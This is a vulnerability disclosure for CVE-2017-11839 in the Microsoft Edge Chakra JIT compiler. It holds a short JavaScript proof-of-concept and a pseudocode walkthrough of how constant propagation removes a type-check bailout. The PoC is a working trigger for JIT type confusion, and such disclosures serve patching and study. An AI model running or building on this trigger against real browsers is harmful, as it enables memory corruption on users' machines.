Microsoft Edge: Chakra: JIT: BailOutOnTaggedValue bailouts can be generated for constant values(CVE-2017-11839)

                                                function opt2(inlinee, v) {
    if (v > 0) {
        inlinee();
    } else {
        inlinee.x = 1.1;
    }
}

function opt() {
    opt2(2.3023e-320, null);
}

function main() {
    opt2(() => {}, 1);  // feed a function to the profiler

    for (let i = 0; i < 10000; i++) {
        opt();
    }
}

main();

We can simply think it as follows:
(NOT PRECISE just for understanding)

Just after inlining:
    // Basic block (a)
    s2 = 2.30235E-320;  // constant
    inlinee = s2;  // variable
    if (null > 0) {
        // Basic block (b)
        BailOnNotObject(inlinee);
        inlinee();
    } else {
        // Basic block (c)
        inlinee.x = 1.1;
    }

    Type map:
        Constants:
            s2: CanBeTaggedValue_Float
        Basic block (a):
            inlinee: CanBeTaggedValue_Float
        Basic block (b):
            inlinee: CanBeTaggedValue_Float
        Basic block (c):
            inlinee: CanBeTaggedValue_Float

In the Global Optimization Phase:
    // Basic block (a)
    s2 = 2.30235E-320;
    if (null > 0) {
        // Basic block (b)
        BailOnNotObject(s2);
        s2();
    } else {
        // Basic block (c)
        s2.x = 1.1;
    }

    Type map:
        Constants:
            s2: CanBeTaggedValue_Float -> Float
        Basic block (a):
        Basic block (b):
        Basic block (c):